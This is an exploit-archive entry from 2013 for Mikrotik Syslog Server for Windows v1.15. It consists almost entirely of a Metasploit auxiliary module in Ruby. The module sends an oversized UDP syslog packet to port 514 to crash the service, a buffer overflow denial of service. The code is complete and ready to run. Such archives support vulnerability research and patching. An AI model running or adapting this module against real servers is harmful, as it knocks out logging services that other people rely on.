Mikrotik Syslog Server Remote BOF DOS

2013-04-21T00:00:00
ID 1337DAY-ID-20675
Type zdt
Reporter xis_one
Modified 2013-04-21T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            # Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS 
# Date: 19.04.2013
# Exploit Author: [email protected] Solutions 
# Vendor Homepage:  www.mikrotik.com
# Software Link: http://www.mikrotik.com/download/MT_Syslog.exe
# Version: 1.15 (most recent version 19.04.2013) 
# Tested on: Windows XP SP3, Windows 7 SP1 

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Udp
	include Msf::Auxiliary::Dos

	def initialize
		super(
			'Name'        => 'Mikrotik Syslog Server for Windows - remote BOF DOS',
			'Description' => %q{
					This module triggers the windows socket error WSAEMSGSIZE (message to long)
                                        in the Mikrotik Syslog Server for Windows v 1.15 and crashes it.
                                        The long syslog message overwrite the allocated buffer space causing the socket error.
                                          
			},
			'Author'      => '[email protected] Solutions',
			'License'     => MSF_LICENSE,
			'DisclosureDate' => 'Apr 19 2013')

		register_options(
			[
				Opt::RPORT(514)
			])
	end

	def run
		connect_udp
		pkt = "<0>" + "Apr19 " +  "10.0.0.2 " + "badass" + ": " + "A"*5000
		print_status("Crashing the remote Mikrotik syslog server #{rhost}")
		udp_sock.put(pkt)
		disconnect_udp
	end
end

#  0day.today [2018-03-09]  #